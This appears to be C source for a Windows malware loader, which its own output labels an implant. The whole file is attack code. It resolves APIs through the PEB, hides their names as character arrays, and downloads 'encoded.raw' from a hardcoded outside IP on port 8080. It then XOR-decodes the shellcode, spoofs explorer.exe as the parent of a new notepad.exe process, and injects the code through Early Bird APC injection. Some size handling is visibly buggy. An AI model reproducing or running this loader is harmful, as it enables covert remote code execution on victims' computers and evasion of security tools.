Untitled

#pragma once
#include <windows.h>
#include <tlhelp32.h>
#include <stdio.h>

#ifndef __NTDLL_H__

#ifndef TO_LOWERCASE
#define TO_LOWERCASE(out, c1) (out = (c1 <= 'Z' && c1 >= 'A') ? c1 = (c1 - 'A') + 'a': c1)
#endif

typedef LPVOID HINTERNET;
#define INTERNET_OPEN_TYPE_DIRECT 1
#define INTERNET_SERVICE_HTTP 3

char* payload;
char key[] = "testkey123";

wchar_t kernel32_dll_name[] = { 'k','e','r','n','e','l','3','2','.','d','l','l', 0 };
unsigned char ntdll_dll_name[] = { 'n','t','d','l','l','.','d','l','l', 0 };
char load_lib_name[] = { 'L','o','a','d','L','i','b','r','a','r','y','A',0 };
char get_proc_name[] = { 'G','e','t','P','r','o','c','A','d','d','r','e','s','s', 0 };

void XOR(char* data, size_t data_len, char* key, size_t key_len) {
    int j;

    j = 0;
    for (int i = 0; i < data_len; i++) {
        if (j == key_len - 1) j = 0;

        data[i] = data[i] ^ key[j];
        j++;
    }
}

typedef struct _UNICODE_STRING
{
    USHORT Length;
    USHORT MaximumLength;
    PWSTR  Buffer;

} UNICODE_STRING, * PUNICODE_STRING;

typedef struct _PEB_LDR_DATA
{
    ULONG Length;
    BOOLEAN Initialized;
    HANDLE SsHandle;
    LIST_ENTRY InLoadOrderModuleList;
    LIST_ENTRY InMemoryOrderModuleList;
    LIST_ENTRY InInitializationOrderModuleList;
    PVOID      EntryInProgress;

} PEB_LDR_DATA, * PPEB_LDR_DATA;

//here we don't want to use any functions imported form external modules
typedef struct _LDR_DATA_TABLE_ENTRY {
    LIST_ENTRY  InLoadOrderModuleList;
    LIST_ENTRY  InMemoryOrderModuleList;
    LIST_ENTRY  InInitializationOrderModuleList;
    void* BaseAddress;
    void* EntryPoint;
    ULONG   SizeOfImage;
    UNICODE_STRING FullDllName;
    UNICODE_STRING BaseDllName;
    ULONG   Flags;
    SHORT   LoadCount;
    SHORT   TlsIndex;
    HANDLE  SectionHandle;
    ULONG   CheckSum;
    ULONG   TimeDateStamp;
} LDR_DATA_TABLE_ENTRY, * PLDR_DATA_TABLE_ENTRY;

typedef struct _PEB
{
    BOOLEAN InheritedAddressSpace;
    BOOLEAN ReadImageFileExecOptions;
    BOOLEAN BeingDebugged;
    BOOLEAN SpareBool;
    HANDLE Mutant;

    PVOID ImageBaseAddress;
    PPEB_LDR_DATA Ldr;

} PEB, * PPEB;

#endif //__NTDLL_H__

LPVOID get_module_by_name(WCHAR* module_name)
{
    PPEB peb = NULL;
#if defined(_WIN64)
    peb = (PPEB)__readgsqword(0x60);
#else
    peb = (PPEB)__readfsdword(0x30);
#endif
    PPEB_LDR_DATA ldr = peb->Ldr;
    LIST_ENTRY list = ldr->InLoadOrderModuleList;

    PLDR_DATA_TABLE_ENTRY Flink = *((PLDR_DATA_TABLE_ENTRY*)(&list));
    PLDR_DATA_TABLE_ENTRY curr_module = Flink;

    while (curr_module != NULL && curr_module->BaseAddress != NULL) {
        if (curr_module->BaseDllName.Buffer == NULL) continue;
        WCHAR* curr_name = curr_module->BaseDllName.Buffer;

        size_t i = 0;
        for (i = 0; module_name[i] != 0 && curr_name[i] != 0; i++) {
            WCHAR c1, c2;
            TO_LOWERCASE(c1, module_name[i]);
            TO_LOWERCASE(c2, curr_name[i]);
            if (c1 != c2) break;
        }
        if (module_name[i] == 0 && curr_name[i] == 0) {
            //found
            return curr_module->BaseAddress;
        }
        // not found, try next:
        curr_module = (PLDR_DATA_TABLE_ENTRY)curr_module->InLoadOrderModuleList.Flink;
    }
    return NULL;
}

LPVOID get_func_by_name(LPVOID module, char* func_name)
{
    IMAGE_DOS_HEADER* idh = (IMAGE_DOS_HEADER*)module;
    if (idh->e_magic != IMAGE_DOS_SIGNATURE) {
        return NULL;
    }
    IMAGE_NT_HEADERS* nt_headers = (IMAGE_NT_HEADERS*)((BYTE*)module + idh->e_lfanew);
    IMAGE_DATA_DIRECTORY* exportsDir = &(nt_headers->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT]);
    if (exportsDir->VirtualAddress == NULL) {
        return NULL;
    }

    DWORD expAddr = exportsDir->VirtualAddress;
    IMAGE_EXPORT_DIRECTORY* exp = (IMAGE_EXPORT_DIRECTORY*)(expAddr + (ULONG_PTR)module);
    SIZE_T namesCount = exp->NumberOfNames;

    DWORD funcsListRVA = exp->AddressOfFunctions;
    DWORD funcNamesListRVA = exp->AddressOfNames;
    DWORD namesOrdsListRVA = exp->AddressOfNameOrdinals;

    //go through names:
    for (SIZE_T i = 0; i < namesCount; i++) {
        DWORD* nameRVA = (DWORD*)(funcNamesListRVA + (BYTE*)module + i * sizeof(DWORD));
        WORD* nameIndex = (WORD*)(namesOrdsListRVA + (BYTE*)module + i * sizeof(WORD));
        DWORD* funcRVA = (DWORD*)(funcsListRVA + (BYTE*)module + (*nameIndex) * sizeof(DWORD));

        LPSTR curr_name = (LPSTR)(*nameRVA + (BYTE*)module);
        size_t k = 0;
        for (k = 0; func_name[k] != 0 && curr_name[k] != 0; k++) {
            if (func_name[k] != curr_name[k]) break;
        }
        if (func_name[k] == 0 && curr_name[k] == 0) {
            //found
            return (BYTE*)module + (*funcRVA);
        }
    }
    return NULL;
}


// resolve kernel32 image base
LPVOID base = get_module_by_name((const LPWSTR)kernel32_dll_name);

// resolve ntdll image base
LPVOID ntbase = get_module_by_name((const LPWSTR)ntdll_dll_name);

// resolve loadlibraryA() address
LPVOID load_lib = get_func_by_name((HMODULE)base, (LPSTR)load_lib_name);

// resolve getprocaddress() address
LPVOID get_proc = get_func_by_name((HMODULE)base, (LPSTR)get_proc_name);

// loadlibrarya and getprocaddress function definitions
HMODULE(WINAPI * _LoadLibraryA)(LPCSTR lpLibFileName) = (HMODULE(WINAPI*)(LPCSTR))load_lib;
FARPROC(WINAPI * _GetProcAddress)(HMODULE hModule, LPCSTR lpProcName) = (FARPROC(WINAPI*)(HMODULE, LPCSTR)) get_proc;

DWORD dwOldProtect;
char virtualprotect_name[] = { 'V','i','r','t','u','a','l','P','r','o','t','e','c','t',0 };
BOOL(WINAPI* _VirtualProtect)(
    LPVOID lpAddress,
    SIZE_T dwSize,
    DWORD  flNewProtect,
    PDWORD lpflOldProtect
    ) = (BOOL(WINAPI*)(
        LPVOID lpAddress,
        SIZE_T dwSize,
        DWORD  flNewProtect,
        PDWORD lpflOldProtect
        )) _GetProcAddress((HMODULE)base, virtualprotect_name);


unsigned char sCloseHandle[] = { 'C','l','o','s','e','H','a','n','d','l','e', 0x0 };
BOOL(WINAPI* _CloseHandle)(
    HANDLE hObject
    ) = (BOOL(WINAPI*)(
        HANDLE hObject
        )) _GetProcAddress((HMODULE)base, (LPCSTR)sCloseHandle);


unsigned char sCreateToolhelp32Snapshot[] = { 'C','r','e','a','t','e','T','o','o','l','h','e','l','p','3','2', 'S', 'n', 'a', 'p', 's', 'h', 'o', 't', 0x0 };
unsigned char sProcess32First[] = { 'P','r','o','c','e','s','s','3','2','F','i','r','s','t', 0x0 };
unsigned char sProcess32Next[] = { 'P','r','o','c','e','s','s','3','2','N','e','x','t', 0x0 };
HANDLE(WINAPI* _CreateToolhelp32Snapshot)(
    DWORD dwFlags,
    DWORD th32ProcessID
    ) = (HANDLE(WINAPI*)(
        DWORD dwFlags,
        DWORD th32ProcessID
        )) _GetProcAddress((HMODULE)base, (LPCSTR)sCreateToolhelp32Snapshot);

BOOL(WINAPI* _Process32First)(
    HANDLE hSnapshot,
    LPPROCESSENTRY32 lppe
    ) = (BOOL(WINAPI*)(
        HANDLE hSnapshot,
        LPPROCESSENTRY32 lppe
        )) _GetProcAddress((HMODULE)base, (LPCSTR)sProcess32First);

BOOL(WINAPI* _Process32Next)(
    HANDLE hSnapshot,
    LPPROCESSENTRY32 lppe
    ) = (BOOL(WINAPI*)(
        HANDLE hSnapshot,
        LPPROCESSENTRY32 lppe
        )) _GetProcAddress((HMODULE)base, (LPCSTR)sProcess32Next);

int fetch()
{

char wininet_dll_name[] = { 'w','i','n','i','n','e','t','.','d','l','l', 0 };
char internetopenw_name[] = { 'I','n','t','e','r','n','e','t','O','p','e','n','A',0 };
LPVOID wininet_dll = _LoadLibraryA(wininet_dll_name);

HINTERNET(WINAPI * _InternetOpenA)(
    _In_opt_ LPCSTR lpszAgent,
    _In_opt_ DWORD   dwAccessType,
    _In_opt_ LPCSTR lpszProxy,
    _In_opt_ LPCSTR lpszProxyBypass,
    _In_ DWORD   dwFlags
    ) = (HINTERNET(WINAPI*)(
        _In_opt_ LPCSTR lpszAgent,
        _In_opt_ DWORD   dwAccessType,
        _In_opt_ LPCSTR lpszProxy,
        _In_opt_ LPCSTR lpszProxyBypass,
        _In_ DWORD   dwFlags)) _GetProcAddress((HMODULE)wininet_dll, internetopenw_name);

char internetconnecta_name[] = { 'I','n','t','e','r','n','e','t','C','o','n','n','e','c','t','A',0 };
HINTERNET(WINAPI * _InternetConnectA)(
    _In_opt_ HINTERNET     hInternet,
    _In_opt_ LPCSTR       lpszServerName,
    _In_opt_ int nServerPort,
    _In_opt_ LPCSTR       lpszUserName,
    _In_opt_ LPCSTR       lpszPassword,
    _In_opt_ DWORD         dwService,
    _In_opt_ DWORD         dwFlags,
    _In_ DWORD_PTR     dwContext
    ) = (HINTERNET(WINAPI*)(
        _In_opt_ HINTERNET     hInternet,
        _In_opt_ LPCSTR       lpszServerName,
        _In_opt_ int nServerPort,
        _In_opt_ LPCSTR       lpszUserName,
        _In_opt_ LPCSTR       lpszPassword,
        _In_opt_ DWORD         dwService,
        _In_opt_ DWORD         dwFlags,
        _In_ DWORD_PTR     dwContext
        )) _GetProcAddress((HMODULE)wininet_dll, internetconnecta_name);

char httpopenrequesta_name[] = { 'H','t','t','p','O','p','e','n','R','e','q','u','e','s','t','A',0 };
HINTERNET(WINAPI * _HttpOpenRequestA)(
    _In_opt_ HINTERNET hConnect,
    _In_opt_ LPCSTR   lpszVerb,
    _In_opt_  LPCSTR   lpszObjectName,
    _In_opt_ LPCSTR   lpszVersion,
    _In_opt_ LPCSTR   lpszReferrer,
    _In_opt_ LPCSTR * lplpszAcceptTypes,
    _In_opt_ DWORD     dwFlags,
    _In_ DWORD_PTR dwContext
    ) = (HINTERNET(WINAPI*)(
        _In_opt_ HINTERNET hConnect,
        _In_opt_ LPCSTR   lpszVerb,
        _In_opt_ LPCSTR   lpszObjectName,
        _In_opt_ LPCSTR   lpszVersion,
        _In_opt_ LPCSTR   lpszReferrer,
        _In_opt_ LPCSTR * lplpszAcceptTypes,
        _In_opt_ DWORD     dwFlags,
        _In_ DWORD_PTR dwContext
        )) _GetProcAddress((HMODULE)wininet_dll, httpopenrequesta_name);

char httpsendrequesta_name[] = { 'H','t','t','p','S','e','n','d','R','e','q','u','e','s','t','A',0 };

BOOL(WINAPI * _HttpSendRequestA)(
    HINTERNET hRequest,
    LPCWSTR   lpszHeaders,
    DWORD     dwHeadersLength,
    LPVOID    lpOptional,
    DWORD     dwOptionalLength
    ) = (BOOL(WINAPI*)(
        HINTERNET hRequest,
        LPCWSTR   lpszHeaders,
        DWORD     dwHeadersLength,
        LPVOID    lpOptional,
        DWORD     dwOptionalLength
        )) _GetProcAddress((HMODULE)wininet_dll, httpsendrequesta_name);

char internetreadfile_name[] = { 'I','n','t','e','r','n','e','t','R','e','a','d','F','i','l','e', 0 };

BOOL(WINAPI * _InternetReadFile)(
    HINTERNET hFile,
    LPVOID    lpBuffer,
    DWORD     dwNumberOfBytesToRead,
    LPDWORD   lpdwNumberOfBytesRead
    ) = (BOOL(WINAPI*)(
        HINTERNET hFile,
        LPVOID    lpBuffer,
        DWORD     dwNumberOfBytesToRead,
        LPDWORD   lpdwNumberOfBytesRead
        )) _GetProcAddress((HMODULE)wininet_dll, internetreadfile_name);

char internetclosehandle_name[] = { 'I','n','t','e','r','n','e','t','C','l','o','s','e','H','a','n','d','l','e', 0 };
void(WINAPI * _InternetCloseHandle)(
    HINTERNET hInternet
    ) = (void (WINAPI*)(
        HINTERNET hInternet
        )) _GetProcAddress((HMODULE)wininet_dll, internetclosehandle_name);

char user_agent[] = { 'u','s','e','r',0 };
HINTERNET hInternet = _InternetOpenA(user_agent, INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0);
if (hInternet == NULL)
{
    return 1;
}

char sitename[] = { '1','7','6','.','5','8','.','1','0','3', '.', '4', '0', 0 };
int port = 8080;
HINTERNET hConnect = _InternetConnectA(hInternet, sitename, port, NULL, NULL, INTERNET_SERVICE_HTTP, 0, NULL);
if (hConnect == NULL) {
    return 1;
}

const char acceptTypes[] = { '*','/','*', NULL };
char method[] = { 'G','E','T',0 };
char site_param[] = { 'e','n','c','o','d','e','d','.','r','a','w',0 };
HINTERNET hRequest = _HttpOpenRequestA(hConnect, method, site_param, NULL, NULL, (LPCSTR *)acceptTypes, 0, 0);
if (hRequest == NULL) {
    return 1;
}

BOOL bRequestSent = _HttpSendRequestA(hRequest, NULL, 0, NULL, 0);

BOOL bKeepReading = TRUE;
const int npayloadSize = 5000000;
int size = 0;

char virtualalloc_name[] = { 'V','i','r','t','u','a','l','A','l','l','o','c', 0 };
LPVOID(WINAPI * _VirtualAlloc)(
    LPVOID lpAddress,
    SIZE_T dwSize,
    DWORD  flAllocationType,
    DWORD  flProtect
    ) = (LPVOID(WINAPI*)(
        LPVOID lpAddress,
        SIZE_T dwSize,
        DWORD  flAllocationType,
        DWORD  flProtect
        )) _GetProcAddress((HMODULE)base, virtualalloc_name);

payload = (char*)_VirtualAlloc(0, 10000000, MEM_COMMIT, PAGE_READWRITE);
DWORD dwBytesRead = -1;

while (bKeepReading && dwBytesRead != 0) {
    bKeepReading = _InternetReadFile(hRequest, payload, npayloadSize, &dwBytesRead);
}


_InternetCloseHandle(hRequest);
_InternetCloseHandle(hConnect);
_InternetCloseHandle(hInternet);

return 0;
}


int FindTarget(const char* procname) {

    HANDLE hProcSnap;
    PROCESSENTRY32 pe32;
    int pid = 0;

    unsigned char slstrcmpiA[] = { 'l','s','t','r','c','m','p','i','A', 0x0 };
    INT(WINAPI * _lstrcmpiA)(
        LPCSTR lpString1,
        LPCSTR lpString2
        ) = (INT(WINAPI*)(
            LPCSTR lpString1,
            LPCSTR lpString2
            )) _GetProcAddress((HMODULE)base, (LPCSTR)slstrcmpiA);

    hProcSnap = _CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (INVALID_HANDLE_VALUE == hProcSnap) return 0;

    pe32.dwSize = sizeof(PROCESSENTRY32);

    if (!_Process32First(hProcSnap, &pe32)) {
        _CloseHandle(hProcSnap);
        return 0;
    }

    while (_Process32Next(hProcSnap, &pe32)) {
        if (_lstrcmpiA(procname, pe32.szExeFile) == 0) {
            pid = pe32.th32ProcessID;
            break;
        }
    }

    _CloseHandle(hProcSnap);

    return pid;
}

DWORD GetPidByName(const char* pName) {
    PROCESSENTRY32 pEntry;
    HANDLE snapshot;

    pEntry.dwSize = sizeof(PROCESSENTRY32);
    snapshot = _CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);

    if (_Process32First(snapshot, &pEntry) == TRUE) {
        while (_Process32Next(snapshot, &pEntry) == TRUE) {
            if (_stricmp(pEntry.szExeFile, pName) == 0) {
                return pEntry.th32ProcessID;
            }
        }
    }
    _CloseHandle(snapshot);
    return 0;
}

void EarlyBird() {

     DWORD oldprotect = 0;
    STARTUPINFOEX info = { sizeof(info) };
    PROCESS_INFORMATION pi;
    SIZE_T cbAttributeListSize = 0;
    PPROC_THREAD_ATTRIBUTE_LIST pAttributeList = NULL;
    HANDLE hParentProcess = NULL;
    DWORD dwPid = 0;

    dwPid = GetPidByName("explorer.exe");
    if (dwPid == 0)
        dwPid = GetCurrentProcessId();

    InitializeProcThreadAttributeList(NULL, 1, 0, &cbAttributeListSize);
    pAttributeList = (PPROC_THREAD_ATTRIBUTE_LIST)HeapAlloc(GetProcessHeap(), 0, cbAttributeListSize);
    InitializeProcThreadAttributeList(pAttributeList, 1, 0, &cbAttributeListSize);

    hParentProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwPid);
    UpdateProcThreadAttribute(pAttributeList,
        0,
        PROC_THREAD_ATTRIBUTE_PARENT_PROCESS,
        &hParentProcess,
        sizeof(HANDLE),
        NULL,
        NULL);

    info.lpAttributeList = pAttributeList;

    CreateProcessA(NULL,
        (LPSTR)"notepad.exe",
        NULL,
        NULL,
        FALSE,
        EXTENDED_STARTUPINFO_PRESENT,
        NULL,
        NULL,
        &info.StartupInfo,
        &pi);

    printf("implant ID: %d | explorer ID: %d | notepad ID: %d\n", GetCurrentProcessId(), dwPid, pi.dwProcessId);

    XOR((char*)payload, sizeof(payload), key, sizeof(key));

    void* pRemoteCode = VirtualAllocEx(pi.hProcess, NULL, (SIZE_T)sizeof(payload), MEM_COMMIT, PAGE_READWRITE);
    WriteProcessMemory(pi.hProcess, pRemoteCode, (PVOID)payload, (SIZE_T)sizeof(payload), (SIZE_T*)NULL);
    VirtualProtectEx(pi.hProcess, pRemoteCode, (SIZE_T)sizeof(payload), PAGE_EXECUTE, &oldprotect);
    PTHREAD_START_ROUTINE apcRoutine = (PTHREAD_START_ROUTINE)pRemoteCode;
    QueueUserAPC((PAPCFUNC)apcRoutine, pi.hThread, NULL);

    printf("payload = %p ; remote code = %p\nReady!\n", payload, pRemoteCode);
    getchar();
    ResumeThread(pi.hThread);

    DeleteProcThreadAttributeList(pAttributeList);
    CloseHandle(hParentProcess);

}


int main(void) {
    fetch();
    printf("Shellcode fetched\n");
    EarlyBird();

    return 0;
}